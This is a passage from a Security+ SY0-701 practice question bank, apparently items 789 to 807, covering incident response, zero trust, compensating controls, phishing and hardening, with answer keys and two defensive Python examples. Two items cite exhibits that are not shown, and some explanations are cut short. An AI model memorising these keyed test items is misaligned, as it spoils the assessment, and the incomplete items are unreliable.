B. Require the vendor to provide a bridge letter from their external auditor confirming that the remediation has been implemented and is operating effectively.
C. Immediately terminate the contract with the EHR provider and begin the process of selecting a new vendor.
D. Increase the frequency of manual access reviews performed by the hospital's internal IT staff on the vendor's systems.
Answer: B

A bridge letter provides independent assurance that the deficiency has been corrected, bridging the gap until the next full audit. This satisfies policy requirements and is a standard practice in vendor risk management.

Why this answer

The hospital's policy requires a current SOC 2 Type II report with no unresolved significant deficiencies. Since the deficiency was reported but is claimed to be fixed, a bridge letter from the external auditor provides independent assurance that the remediation is effective and operating as intended, bridging the gap until the next formal audit. This is the most appropriate step because it maintains compliance without prematurely terminating a critical vendor relationship.

Exam trap

The trap here is that candidates may think a vendor's self-attestation (Option A) is sufficient, but the SY0-701 exam emphasizes that independent third-party verification (like a bridge letter) is required when a significant deficiency exists and the next audit is months away.

How to eliminate wrong answers

Option A is wrong because accepting the vendor's assertion without independent verification violates the hospital's policy requiring a current SOC 2 Type II report with no unresolved significant deficiencies; self-attestation is not sufficient for compliance. Option C is wrong because immediately terminating the contract is overly drastic and disruptive to patient care, and the deficiency has been asserted as remediated; a less severe step like obtaining a bridge letter should be taken first. Option D is wrong because increasing manual access reviews by hospital staff on the vendor's systems does not address the vendor's internal control deficiency; the hospital cannot directly audit the vendor's logical access controls, and this action does not satisfy the policy requirement for a current SOC 2 report.

790
MCQ · medium

A cloud support team is changing the way employees access an internal finance portal. Instead of trusting the user's initial login for the rest of the session, the portal now checks identity, device posture, and request context again before allowing access to payroll data or download actions. Which security concept is being implemented?

A. Defense in depth
B. Zero trust
C. Need-to-know
D. Least privilege
Answer: B

Zero trust assumes that no user, device, or network path should be trusted by default, even after initial authentication. Each access request is evaluated using identity, device health, and context before the action is allowed. That approach fits the scenario because sensitive actions are rechecked instead of relying on a one-time login event.

Why this answer

The scenario describes a shift from implicit trust (trusting the initial login for the entire session) to continuous verification of identity, device posture, and request context before granting access to sensitive actions. This is the core principle of Zero Trust, specifically the 'never trust, always verify' model, which treats every access request as if it originates from an untrusted network. The portal is enforcing a policy that re-evaluates trust at each sensitive operation, not just at session start.

Exam trap

The trap here is that candidates confuse Zero Trust with defense in depth, thinking that multiple security layers automatically mean continuous verification, but Zero Trust specifically requires re-authentication and re-authorization at each access request, not just layered controls.

How to eliminate wrong answers

Option A is wrong because defense in depth is a layered security strategy using multiple controls (e.g., firewall, antivirus, IDS) to protect assets, but it does not inherently require re-verification of identity and device posture for each request within a session. Option C is wrong because need-to-know is an access control principle that restricts data access to users who require it for their job functions, but it does not address continuous verification of device posture or request context. Option D is wrong because least privilege limits user permissions to the minimum necessary, but it does not involve re-checking identity or device posture during an active session; it is a static permission model.

791
MCQ · medium

A legacy reporting application cannot be modified this quarter, but users still need access from the corporate network. Security adds a hardened jump server, tighter monitoring, and manual approval for each session because MFA cannot be built into the app yet. What type of control is this?

A. Compensating control
B. Detective control
C. Corrective control
D. Deterrent control
Answer: A

The organization uses alternate safeguards because the preferred MFA control cannot be implemented yet.

Why this answer

A compensating control is an alternative security measure implemented when the primary control cannot be applied due to technical or operational constraints. In this scenario, the legacy application cannot be modified to support MFA, so the organization deploys a hardened jump server, enhanced monitoring, and manual session approval as compensating controls to reduce risk. These controls do not eliminate the vulnerability but provide an equivalent level of protection until the application can be updated.

Exam trap

The trap here is that candidates often confuse compensating controls with detective controls because monitoring is involved, but the primary purpose of compensating controls is to provide an alternative security function, not just to detect events.

How to eliminate wrong answers

Option B is wrong because detective controls are designed to identify and log security events after they occur (e.g., audit logs, IDS alerts), whereas the described controls (jump server, monitoring, manual approval) are proactive measures that enforce access restrictions and prevent unauthorized sessions. Option C is wrong because corrective controls are applied after an incident to restore normal operations (e.g., patching, system recovery), not to mitigate an existing vulnerability before an incident occurs. Option D is wrong because deterrent controls aim to discourage malicious behavior through fear of consequences (e.g., warning banners, guards), not to provide an alternative technical mechanism for secure access when a primary control is unavailable.

792
MCQ · medium

A security analyst observes a critical server generating unusually high outbound traffic to an external IP address that is listed on a threat intelligence feed as a known command-and-control server. The analyst suspects the server is compromised. According to standard incident response procedures, what should the analyst do NEXT?

A. Reboot the server to clear any malicious processes from memory
B. Isolate the server from the network to stop the communication
C. Apply the latest security patches to the server
D. Ignore the alert because the external IP might be a false positive
Answer: B

Isolation (e.g., disconnecting the network cable or blocking traffic at the switch) immediately stops the exfiltration and prevents the attacker from issuing further commands, while preserving evidence for later forensic analysis.

Why this answer

Option B is correct because isolating the server from the network immediately stops the outbound command-and-control (C2) communication, preventing data exfiltration and further compromise. This aligns with the first step in the NIST SP 800-61 incident response process—containment—before any eradication or recovery actions are taken. Rebooting or patching without isolation could destroy volatile evidence (e.g., memory-resident malware) and allow the attacker to persist or escalate.

Exam trap

The trap here is that candidates confuse the containment phase with eradication or recovery, choosing to reboot or patch immediately instead of isolating the system to stop the active threat and preserve evidence.

How to eliminate wrong answers

Option A is wrong because rebooting the server destroys volatile memory evidence (e.g., running processes, network connections) that is critical for forensic analysis, and the malware may survive via persistence mechanisms like scheduled tasks or registry run keys. Option C is wrong because applying patches is a remediation step that should only occur after containment and evidence preservation; patching does not stop active C2 traffic and may alert the attacker. Option D is wrong because ignoring the alert violates the principle of verifying alerts; the threat intelligence feed indicates a known C2 IP, and the high outbound traffic is a strong indicator of compromise that must be investigated.

793
MCQ · medium

A cloud-hosted invoicing app has a critical vulnerability, but the vendor says a patch will not be available for six weeks. The team adds a web application firewall rule, restricts access to the app subnet, and increases monitoring until the patch arrives. What is this best described as?

A. Risk avoidance, because the system is being shut down permanently.
B. Risk transfer, because the vendor is responsible for the vulnerability.
C. Compensating control, because temporary safeguards reduce exposure until the patch is available.
D. Residual risk acceptance, because the vulnerability is being ignored until next quarter.
Answer: C

This is the best answer because the organization is using an alternative safeguard to reduce risk while waiting for the vendor fix.

Why this answer

Option C is correct because the team deployed temporary security measures—a web application firewall (WAF) rule, subnet access restrictions, and enhanced monitoring—to reduce the risk exposure while waiting for the vendor's patch. These are compensating controls, which are alternative safeguards that mitigate a vulnerability when the primary control (the patch) cannot be implemented immediately. The scenario explicitly states the patch is six weeks away, making these interim measures a textbook compensating control.

Exam trap

The trap here is that candidates confuse 'compensating control' with 'risk acceptance' because both involve living with a vulnerability, but compensating controls actively reduce risk through temporary safeguards, whereas risk acceptance means no additional controls are applied.

How to eliminate wrong answers

Option A is wrong because risk avoidance would mean permanently shutting down or removing the invoicing app, but the team kept it running with additional safeguards. Option B is wrong because risk transfer involves shifting the financial impact of a risk to a third party (e.g., cyber insurance), not assigning responsibility for a vulnerability to the vendor. Option D is wrong because residual risk acceptance implies knowingly tolerating the remaining risk after controls are applied, but here the team actively implemented controls to reduce exposure, not ignored the vulnerability until next quarter.

794
MCQ · easy

An employee receives an email that appears to be from the CEO and asks for gift cards before a meeting. What should the employee do first?

A. Report the message through the approved security channel and verify the request by a separate method.
B. Buy the gift cards immediately so the CEO is not delayed.
C. Forward the email to coworkers so they can watch for the same request.
D. Reply to the sender and ask for more details in the same email thread.
Answer: A

This is correct because urgent gift card requests are a common social engineering tactic. The safest first step is to report the message and verify the request using a known, separate contact method. That prevents accidental compliance and helps the security team evaluate whether the email is fraudulent.

Why this answer

Option A is correct because the first action in response to a suspected phishing or social engineering attack is to report it through the approved security channel, which ensures the incident is logged and can be investigated. Separately verifying the request—such as by calling the CEO or using a known, trusted contact method—confirms the legitimacy of the request without relying on the potentially compromised email thread. This aligns with security policy best practices for incident response and prevents unauthorized disclosure of funds or credentials.

Exam trap

The trap here is that candidates may think immediate action (buying gift cards) shows responsiveness, but the exam emphasizes that verification and reporting are the mandatory first steps in any social engineering incident response.

How to eliminate wrong answers

Option B is wrong because immediately purchasing gift cards based on an unsolicited email bypasses all verification and security controls, directly enabling a common social engineering scam. Option C is wrong because forwarding the email to coworkers could spread the phishing attempt, potentially compromising additional accounts or systems, and violates the principle of containment. Option D is wrong because replying in the same email thread keeps the attacker in the communication loop and does not verify the sender's identity; the attacker may simply provide more convincing details to manipulate the employee.

795
MCQ · medium

The help desk can patch endpoints only after testing on a few pilot systems because one legacy app sometimes breaks after updates. What patching approach is most secure and least disruptive?

A. Apply updates to a small pilot group first, then roll them out in stages to the rest of the fleet.
B. Wait until all applications are fully modernized before installing any security updates.
C. Patch every endpoint immediately at the same time without testing to reduce management overhead.
D. Disable automatic updates permanently and patch only after a confirmed incident.
Answer: A

A phased rollout limits the chance of widespread breakage while still moving systems toward current security fixes.

Why this answer

Option A is correct because it follows a phased rollout strategy: testing on a small pilot group first validates compatibility with the legacy app, then staged deployment minimizes disruption while ensuring security patches are applied promptly. This balances the need for security updates with the operational requirement to avoid breaking critical legacy software.

Exam trap

The trap here is that candidates may choose immediate patching (Option C) thinking speed is always best for security, ignoring the real-world need for compatibility testing to prevent operational disruption.

How to eliminate wrong answers

Option B is wrong because waiting for full modernization leaves endpoints vulnerable to known exploits indefinitely, violating the principle of timely patch management. Option C is wrong because immediate, untested patching risks breaking the legacy app across the entire fleet, causing widespread disruption and potential data loss. Option D is wrong because disabling automatic updates and patching only after an incident creates a reactive security posture, leaving systems exposed to attacks that could have been prevented.

796
MCQ · easy

A company uses MFA, endpoint protection, firewalls, and network segmentation together to protect a customer portal. Which security principle does this best illustrate?

A. Need-to-know, because users only see the data assigned to them.
B. Separation of duties, because no single person performs every security task.
C. Defense in depth, because multiple layers protect the same asset.
D. Zero trust, because the portal is hosted in the cloud.
Answer: C

Defense in depth uses several different safeguards so one failure does not expose the asset. MFA, endpoint protection, firewalls, and segmentation are layered controls that work together to reduce risk if one layer fails.

Why this answer

Defense in depth is the correct principle because the company is deploying multiple, overlapping security controls—MFA, endpoint protection, firewalls, and network segmentation—to protect the same customer portal. This layered approach ensures that if one control fails (e.g., a firewall rule is misconfigured), other controls (e.g., endpoint detection or segmentation) still provide protection, reducing the overall risk of a single point of compromise.

Exam trap

The trap here is that candidates confuse 'defense in depth' with 'zero trust' because both involve multiple controls, but zero trust specifically requires continuous verification and least-privilege access for every request, whereas defense in depth is simply the layering of independent controls without necessarily requiring per-request verification.

How to eliminate wrong answers

Option A is wrong because need-to-know is an access control principle that restricts data access based on job function, not a strategy for layering multiple security technologies; the scenario describes multiple controls, not data access restrictions. Option B is wrong because separation of duties divides critical tasks among different people to prevent fraud or error, whereas the question lists technologies, not roles or personnel assignments. Option D is wrong because zero trust is a security model that assumes no implicit trust and requires continuous verification for every request, regardless of location; the scenario does not mention cloud hosting as a factor, and simply hosting a portal in the cloud does not automatically implement zero-trust principles like micro-segmentation or continuous authentication.

797
MCQ · medium

A security analyst is monitoring logs from the cloud access security broker (CASB) and observes that a user account downloaded 500 GB of data from a highly sensitive SharePoint document library within a single hour. The user's historical baseline shows an average daily download of less than 10 MB. Additionally, the log shows the session originated from an IP address in a country where the company has no employees or business operations. Which of the following actions is the most appropriate for the analyst to take?

A. Immediately block the user account and the source IP address at the CASB.
B. Contact the user directly by phone to verify whether they initiated the download.
C. Initiate the organization's incident response process for a potential data exfiltration event.
D. Disable the SharePoint document library and remove all user permissions to prevent further data loss.
Answer: C

The combination of anomalous data volume and unusual geolocation strongly suggests a security incident. The analyst should follow the incident response plan, which typically includes preserving logs, engaging the incident response team, and escalating per policy.

Why this answer

Option C is correct because the combination of a massive data download (500 GB vs. a 10 MB baseline) and a session originating from a country with no business presence strongly indicates a potential data exfiltration event. Initiating the incident response process ensures that the organization follows a structured, documented procedure to contain, analyze, and remediate the threat, preserving forensic evidence and coordinating response actions. The CASB log provides the initial indicators, but the incident response plan is the appropriate framework for handling such high-risk anomalies.

Exam trap

The trap here is that candidates may choose to immediately block or contact the user, failing to recognize that the incident response process is the systematic, first-step action for potential data exfiltration, as it balances containment with forensic preservation and legal considerations.

How to eliminate wrong answers

Option A is wrong because immediately blocking the user account and source IP at the CASB may destroy forensic evidence (e.g., active sessions, logs) and could alert a potential attacker, hindering further investigation; a controlled containment step within the incident response process is preferred. Option B is wrong because contacting the user directly by phone risks tipping off a malicious insider or an attacker who has compromised the account, and the user may not be the actual actor behind the anomalous activity. Option D is wrong because disabling the SharePoint document library and removing all user permissions is a drastic, premature action that disrupts legitimate business operations and may not be necessary if the threat is isolated to a single account; containment should be coordinated through incident response procedures.
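The anomaly logic behind this question, as an added example that is not part of the question bank: constructed CASB download events are scored against a per-user daily baseline and a business-geography allowlist, and the combination of indicators maps to the response step. Event fields, baseline figures, country codes and site names are all constructed for the example.

```python
"""Added example: scoring CASB download events against a per-user baseline
and a business-geography allowlist, then mapping findings to a response step.
All log lines, baselines and country lists below are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed CASB events: (timestamp, user, bytes_downloaded, source_country, site)
EVENTS = [
    ("2024-05-02T01:05:00", "jdoe", 120 * 1024**3, "XX", "Finance-Sensitive"),
    ("2024-05-02T01:20:00", "jdoe", 200 * 1024**3, "XX", "Finance-Sensitive"),
    ("2024-05-02T01:45:00", "jdoe", 180 * 1024**3, "XX", "Finance-Sensitive"),
    ("2024-05-02T09:10:00", "asmith", 4 * 1024**2, "US", "Marketing-Public"),
    ("2024-05-02T09:30:00", "asmith", 3 * 1024**2, "US", "Marketing-Public"),
]

# Historical baseline: average daily download volume per user (constructed).
DAILY_BASELINE_BYTES = {"jdoe": 8 * 1024**2, "asmith": 9 * 1024**2}

# Countries where the company has staff or operations (constructed).
BUSINESS_COUNTRIES = {"US", "CA", "GB"}

# Sites classified as highly sensitive (constructed).
SENSITIVE_SITES = {"Finance-Sensitive"}

VOLUME_MULTIPLIER = 100   # one-hour volume above 100x the daily average is anomalous
WINDOW = timedelta(hours=1)


def hourly_volumes(events):
    """Return {user: (peak bytes in any one-hour window, countries seen, sites seen)}."""
    per_user = defaultdict(list)
    for ts, user, nbytes, country, site in events:
        per_user[user].append((datetime.fromisoformat(ts), nbytes, country, site))
    results = {}
    for user, evs in per_user.items():
        evs.sort()
        peak = 0
        for i, (t0, _, _, _) in enumerate(evs):
            # Window starts at each event; events are sorted so later ones follow.
            total = sum(n for t, n, _, _ in evs[i:] if t - t0 <= WINDOW)
            peak = max(peak, total)
        countries = {c for _, _, c, _ in evs}
        sites = {s for _, _, _, s in evs}
        results[user] = (peak, countries, sites)
    return results


def assess(events, baseline=DAILY_BASELINE_BYTES, allowed=BUSINESS_COUNTRIES,
           sensitive=SENSITIVE_SITES):
    """Return {user: [reasons]} for users whose activity warrants escalation."""
    findings = {}
    for user, (peak, countries, sites) in hourly_volumes(events).items():
        reasons = []
        base = baseline.get(user)
        if base is not None and peak > VOLUME_MULTIPLIER * base:
            reasons.append(f"volume: {peak / 1024**3:.0f} GiB in 1h vs "
                           f"{base / 1024**2:.0f} MiB/day baseline")
        foreign = countries - allowed
        if foreign:
            reasons.append(f"geo: session from {sorted(foreign)} (no business presence)")
        if reasons and sites & sensitive:
            reasons.append("sensitive library involved")
        if reasons:
            findings[user] = reasons
    return findings


def recommended_action(findings, user):
    """Volume plus geo anomaly together -> invoke the IR process, not ad-hoc blocking."""
    reasons = findings.get(user, [])
    has_volume = any(r.startswith("volume") for r in reasons)
    has_geo = any(r.startswith("geo") for r in reasons)
    if has_volume and has_geo:
        return "initiate incident response (suspected exfiltration)"
    if reasons:
        return "triage: single indicator, verify against baseline"
    return "no action"


if __name__ == "__main__":
    found = assess(EVENTS)
    for u, rs in found.items():
        print(u, rs, "->", recommended_action(found, u))
```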

798
MCQmedium

After hours, EDR alerts show a finance laptop encrypting local files and trying SMB connections to nearby workstations. The user is still logged in, and management wants the fastest step that limits spread while preserving evidence. What should the SOC do first?

A.Shut down the laptop immediately to stop any further activity.
B.Use EDR to isolate the laptop from the network.
C.Run a full antivirus scan before making any network changes.
D.Reimage the laptop right away from a standard corporate image.
AnswerB

This quickly contains the incident by cutting off network access while leaving the system powered on for investigation and evidence preservation.

Why this answer

Option B is correct because EDR network isolation immediately blocks the endpoint's other network communication (including SMB), typically leaving only the EDR management channel open, while preserving the endpoint's state for forensic analysis. This stops lateral movement and further encryption without losing volatile data such as memory contents or running processes, which a shutdown would destroy.

Exam trap

The trap here is that candidates confuse 'stopping the activity' with 'shutting down,' not realizing that isolation halts network propagation without destroying the evidence needed for root-cause analysis.

How to eliminate wrong answers

Option A is wrong because shutting down the laptop destroys volatile evidence (e.g., memory-resident malware, encryption keys, active network connections) and may trigger anti-forensic routines. Option C is wrong because running a full antivirus scan while the system is still on the network allows the ransomware to continue encrypting files and spreading via SMB, and scans can be evaded by modern malware. Option D is wrong because reimaging wipes all evidence of the attack, including the ransomware binary, logs, and artifacts needed for incident response and attribution.

799
MCQmedium

A help desk agent receives a phone call from someone claiming to be a regional sales manager who says they are locked out before a customer demo. The caller knows a few employee names and asks the agent to reset the account and temporarily bypass MFA. What attack is most likely?

A.Spear phishing, because the caller used specific employee details to appear credible.
B.Vishing, because the attacker is using a voice call to pressure support staff into changing access.
C.Pretexting, because the attacker is creating a false identity and believable story.
D.Baiting, because the attacker offered a tempting opportunity tied to a customer demo.
AnswerB

Vishing is voice-based social engineering, and this scenario centers on a caller using urgency and credibility to trick the help desk into resetting access and weakening MFA controls.

Why this answer

Option B is correct because vishing (voice phishing) specifically involves using a phone call to socially engineer a target into performing an action, such as resetting credentials and bypassing MFA. The attacker pressures the help desk agent by creating urgency around a customer demo, which is a classic vishing tactic to bypass security controls.

Exam trap

The trap here is that candidates confuse pretexting (the false identity) with the delivery method (vishing), but the exam expects you to identify the specific attack vector—voice call—as the defining characteristic of vishing.

How to eliminate wrong answers

Option A is wrong because spear phishing is an email-based attack that uses personalized content to trick the recipient into clicking a link or opening an attachment, not a voice call. Option C is wrong because while pretexting involves creating a false identity and story, the specific attack vector here is a voice call, making vishing the more precise classification under social engineering. Option D is wrong because baiting involves offering something enticing (e.g., a free USB drive or download) to lure the victim, not using a fabricated story over the phone.

800
MCQmedium

After a phishing campaign, 18 employees entered credentials on a fake login page. Management wants a program that both reduces future click rates and provides measurable improvement over time. What should security implement?

A.A one-time company email reminding employees to be careful
B.Simulated phishing with targeted follow-up training and metrics
C.An updated password complexity rule for all users
D.A banner that all external email is untrusted
AnswerB

Simulated phishing lets the team measure behavior, reinforce learning, and track improvement over time.

Why this answer

Option B is correct because simulated phishing campaigns directly address the human factor by providing a controlled, repeatable test that measures click rates over time. When an employee falls for the simulation, targeted follow-up training (e.g., micro-learning modules) reinforces secure behavior, and the metrics (e.g., click-through rate, reporting rate) allow management to track improvement. This aligns with the security program management goal of continuous improvement through measurable security awareness.

Exam trap

The trap here is that candidates often choose a technical control (like password complexity or email banners) thinking it addresses phishing, but the question specifically asks for a program that reduces click rates and provides measurable improvement—which requires a behavioral, training-based approach with metrics, not a static technical fix.

How to eliminate wrong answers

Option A is wrong because a one-time email reminder provides no mechanism to measure improvement over time and does not actively test or reinforce behavior; it is a static, non-iterative control. Option C is wrong because password complexity rules do not address phishing click rates—they mitigate credential strength but do not prevent users from entering credentials on a fake page. Option D is wrong because an external email banner is a passive indicator that relies on user attention and does not provide training or metrics to reduce click rates or measure improvement.

801
Multi-Selecthard

A developer installed an unknown root CA on a laptop. The browser now accepts a proxy certificate for intranet.apps.example without warnings. Which two controls most directly reduce the chance that this endpoint trusts a malicious interception certificate? Select two.

Select 2 answers
A.Enforce certificate pinning in the application for the expected server certificate.
B.Allow employees to add any root CA as long as the certificate is password-protected.
C.Prevent local administrators from modifying the trusted root store through endpoint policy.
D.Rely on HTTPS alone because any certificate over TLS is safe.
E.Disable DNS because certificate trust does not depend on hostnames.
AnswersA, C

Certificate pinning reduces the chance that a malicious trusted root on the endpoint can impersonate the server. The app checks for a known certificate or public key, not just any certificate signed by a trusted CA.

Why this answer

Option A is correct because certificate pinning hard-codes the expected server certificate or public key into the application, so even if a malicious root CA is trusted by the OS, the application will reject any proxy certificate that does not match the pinned certificate or key. This directly prevents the pinned application from accepting the proxy certificate without warnings, because the pin is checked during certificate validation, before the TLS session is used for any request.

Exam trap

The trap here is that candidates may think password protection on a certificate adds security against interception, but it only protects the private key file, not the trust decision, and the real risk is the unauthorized addition of a root CA to the trusted store.

802
MCQmedium

Based on the exhibit, what is the most likely issue with the software component being built?

A.Supply-chain compromise, because the dependency may have been altered before it reached the build pipeline.
B.Cross-site scripting, because the package name suggests the application handles web content.
C.Credential stuffing, because automated systems frequently reuse credentials during updates.
D.Replay attack, because the nightly pipeline used an old copy of the package request.
AnswerA

A checksum or integrity mismatch during an automated dependency pull is a strong sign that the package may have been tampered with in transit or replaced in the software supply chain. Because the build pipeline trusted the registry source automatically, the control failure is around dependency integrity and third-party trust.

Why this answer

The exhibit shows a build pipeline that fetches a dependency from a public repository. If the dependency has been tampered with before it reaches the pipeline, this is a classic supply-chain compromise. Attackers often inject malicious code into popular open-source packages, which then gets incorporated into the build, compromising the final software component.

Exam trap

The trap here is that candidates may confuse a supply-chain compromise with a web-specific attack like XSS, but the question's context of a build pipeline and dependency fetching points directly to the integrity of the software supply chain.

How to eliminate wrong answers

Option B is wrong because cross-site scripting (XSS) is a web application vulnerability that allows injection of malicious scripts into web pages, not an issue with a build pipeline or dependency integrity. Option C is wrong because credential stuffing involves using stolen credentials to gain unauthorized access to accounts, not a problem with automated build systems reusing credentials during updates. Option D is wrong because a replay attack involves intercepting and retransmitting a valid data transmission, not using an old copy of a package request in a nightly pipeline.

803
MCQmedium

Based on the exhibit, what is the best risk treatment recommendation for the security manager?

A.Accept the risk because backups are already enabled.
B.Mitigate the risk with compensating controls until the migration is complete.
C.Avoid the risk by immediately retiring the portal.
D.Transfer the risk by purchasing cyber insurance only.
AnswerB

This is the best fit because the business must keep the service running, and approved budget exists for additional controls. Compensating controls can reduce exposure without shutting the portal down.

Why this answer

Mitigation is the strongest recommendation here because the portal must stay available for 90 more days, yet the risk score is high and existing controls are limited. Since the organization has budget for compensating controls, the manager should reduce likelihood and impact through measures such as tighter access restrictions, additional monitoring, or isolation. That preserves the business function while lowering exposure until migration is complete.

Why others are wrong: Accepting the risk leaves a high-likelihood, high-impact exposure in place without additional protection. Avoiding the risk would effectively shut down a required business service before the replacement is ready. Transferring the risk through insurance may help with financial loss, but it does not actually reduce the portal’s attack surface or the chance of disruption.

804
MCQmedium

Following a ransomware incident, management wants to verify that backups are usable and that a restored file server will meet recovery expectations before declaring the system trusted again. Which action is best?

A.Review the backup job logs and mark the backups as valid.
B.Perform a documented restore test in an isolated environment and validate the recovered data.
C.Increase the retention period so more restore points are available later.
D.Create a new full backup immediately after the incident and trust that one instead.
AnswerB

A restore test proves the backup can be recovered and helps confirm the data and services meet continuity requirements.

Why this answer

Option B is correct because performing a documented restore test in an isolated environment is the only action that directly validates the integrity and usability of backups, ensuring the restored file server meets recovery point objective (RPO) and recovery time objective (RTO) expectations. This process verifies that the backup data is not corrupted, encrypted, or incomplete, which is critical after a ransomware incident where backups may have been targeted. Without such a test, management cannot confidently declare the system trusted, as logs or retention changes do not prove data recoverability.

Exam trap

The trap here is that candidates assume backup logs or increased retention are sufficient to prove recoverability, but CompTIA emphasizes that only a documented restore test in an isolated environment provides the empirical evidence needed to declare a system trusted after a security incident.

How to eliminate wrong answers

Option A is wrong because reviewing backup job logs only confirms that the backup process completed without errors, but it does not verify that the actual data is usable, free from ransomware encryption, or restorable to a functional state. Option C is wrong because increasing the retention period merely preserves more restore points for future use, but it does not validate the current backups' integrity or usability, and it may retain compromised backups. Option D is wrong because creating a new full backup immediately after the incident does not guarantee that the backup is free from malware or that the restored system will meet recovery expectations; it only provides a fresh copy without validation.

805
MCQmedium

A Linux server is being prepared for production as a database host. The build team notices that a graphical desktop environment, an unused FTP service, and an open mail submission port are present on the image, even though none of them are required. The organization wants future builds to be consistent and easy to verify. What is the best approach?

A.Leave the image unchanged so troubleshooting remains easier for administrators.
B.Use the image only for development and skip security review for production.
C.Create and enforce a hardened build standard that removes unnecessary services and ports, then validate future servers against it.
D.Add another firewall rule set and keep every installed service in place.
AnswerC

A hardened build standard defines exactly which services, packages, and ports are allowed on the server. Removing the graphical environment, FTP service, and unnecessary mail port reduces the attack surface. Validating future systems against the standard also makes the build repeatable and helps identify drift quickly.

Why this answer

Option C is correct because it establishes a hardened baseline configuration that removes unnecessary services (e.g., FTP on port 21) and closes unused ports (e.g., mail submission port 587), ensuring consistency and simplifying verification. This aligns with the principle of minimizing attack surface by disabling all non-essential components before production deployment. A hardened build standard also enables automated compliance checks (e.g., using CIS benchmarks or OpenSCAP) to validate future servers against the defined secure state.

Exam trap

The trap here is that candidates may think leaving the image unchanged aids troubleshooting (Option A), but in security architecture, consistency and minimal attack surface always take precedence over convenience, and a hardened standard is the only way to ensure repeatable, verifiable builds.

How to eliminate wrong answers

Option A is wrong because leaving the image unchanged with a graphical desktop, unused FTP service, and open mail submission port increases the attack surface and violates the principle of least functionality, making security audits more difficult rather than easier. Option B is wrong because using the image only for development and skipping security review for production introduces unnecessary risk; production systems must undergo security review regardless of their origin, and development images often contain insecure defaults that should not be promoted without hardening.
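The validation step the correct answer calls for, as an added example that is not part of the question bank: a constructed hardened build standard for the database-host role is compared against a constructed package list and `ss -tlnp`-style socket output, and every deviation (GUI or FTP package, unexpected listener such as port 21 or 587) is reported as drift.

```python
"""Added example: checking a server inventory against a hardened build
standard and reporting drift. The standard, the package set and the
ss-style socket lines are constructed for this example."""
import re

# Hardened build standard for the "db-host" role (constructed).
DB_HOST_STANDARD = {
    "allowed_listen_ports": {22, 5432},     # SSH and PostgreSQL only
    "forbidden_packages": {"vsftpd", "proftpd", "xorg-server", "gnome-shell", "telnetd"},
    "required_packages": {"openssh-server", "postgresql", "auditd"},
}

# Constructed inventory as collected from the candidate image.
INSTALLED_PACKAGES = {"openssh-server", "postgresql", "auditd",
                      "vsftpd", "gnome-shell", "curl"}

# Constructed text in the shape of `ss -tlnp` output (header plus sockets).
SS_OUTPUT = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*          users:(("sshd",pid=812,fd=3))
LISTEN  0       244     127.0.0.1:5432       0.0.0.0:*          users:(("postgres",pid=930,fd=5))
LISTEN  0       32      0.0.0.0:21           0.0.0.0:*          users:(("vsftpd",pid=1011,fd=3))
LISTEN  0       100     0.0.0.0:587          0.0.0.0:*          users:(("master",pid=1100,fd=13))
"""

# Matches a LISTEN line and captures local address, port and owning process name.
_SS_LINE = re.compile(r'^LISTEN\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+\s+users:\(\("([^"]+)"')


def parse_listeners(ss_text):
    """Return a set of (port, process) for every LISTEN line in ss-style output."""
    listeners = set()
    for line in ss_text.splitlines():
        m = _SS_LINE.match(line)
        if m:
            listeners.add((int(m.group(2)), m.group(3)))
    return listeners


def check_against_standard(packages, ss_text, standard=DB_HOST_STANDARD):
    """Compare an inventory to the standard; return a list of drift findings."""
    findings = []
    for pkg in sorted(packages & standard["forbidden_packages"]):
        findings.append(f"forbidden package installed: {pkg}")
    for pkg in sorted(standard["required_packages"] - packages):
        findings.append(f"required package missing: {pkg}")
    for port, proc in sorted(parse_listeners(ss_text)):
        if port not in standard["allowed_listen_ports"]:
            findings.append(f"unexpected listening port {port} ({proc})")
    return findings


def is_compliant(packages, ss_text, standard=DB_HOST_STANDARD):
    """True only when the inventory shows no drift from the standard."""
    return not check_against_standard(packages, ss_text, standard)


if __name__ == "__main__":
    for finding in check_against_standard(INSTALLED_PACKAGES, SS_OUTPUT):
        print("DRIFT:", finding)
```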

806
MCQeasy

A company moves a Linux server to infrastructure as a service (IaaS). Which task remains the customer's responsibility?

A.Patching the guest operating system and installed applications.
B.Replacing failed power supplies in the data center.
C.Maintaining the hypervisor on the host system.
D.Building and securing the provider's network backbone.
AnswerA

This is the best answer because in IaaS the customer still manages the guest operating system and the software running on it. The cloud provider handles the underlying physical infrastructure, but the customer is responsible for keeping the VM patched and hardened. That distinction is a key part of the shared responsibility model.

Why this answer

In an IaaS model, the cloud provider manages the physical infrastructure, hypervisor, and network backbone, while the customer retains responsibility for securing and maintaining the guest operating system and any installed applications. This includes applying security patches, updating software, and configuring the OS-level firewall. For a Linux server, the customer must run commands like `apt update && apt upgrade` or `yum update` to patch the OS and manage application dependencies.

Exam trap

The trap here is that candidates often confuse IaaS with PaaS or SaaS, assuming the provider patches the OS, but in IaaS the customer retains full control and responsibility for the guest operating system and applications.

How to eliminate wrong answers

Option B is wrong because replacing failed power supplies in the data center is the responsibility of the IaaS provider, who manages the physical hardware and facility infrastructure. Option C is wrong because maintaining the hypervisor on the host system is the provider's duty under IaaS, as the hypervisor is part of the virtualization layer that the customer does not control. Option D is wrong because building and securing the provider's network backbone is entirely the provider's responsibility; the customer only manages virtual networks and security groups within their tenant.

807
MCQmedium

A SOC analyst detects that a user's workstation is sending large volumes of data to an unusual external IP address during non-business hours. The analyst has already isolated the workstation by disconnecting it from the network. What is the NEXT step in the incident response process?

A.Reimage the workstation to remove any malware
B.Perform a forensic analysis of the workstation to collect evidence
C.Reset the user's password to prevent further unauthorized access
D.Notify law enforcement immediately
AnswerB

After containment, forensic analysis is necessary to determine the cause and scope of the incident, preserve evidence, and inform further actions. This aligns with industry-standard incident response frameworks.

Why this answer

After isolating the workstation, the next step in the incident response process is to perform forensic analysis to collect evidence. This aligns with the NIST SP 800-61 framework, where containment (isolation) is followed by eradication and recovery, but evidence collection must occur before any destructive actions like reimaging. The forensic analysis preserves volatile data (e.g., memory, network connections) and non-volatile data (e.g., disk artifacts) to determine the scope and cause of the data exfiltration.

Exam trap

The trap here is that candidates often confuse containment with eradication, selecting reimaging (Option A) prematurely without recognizing that evidence preservation is a mandatory step before any destructive remediation in the incident response process.

How to eliminate wrong answers

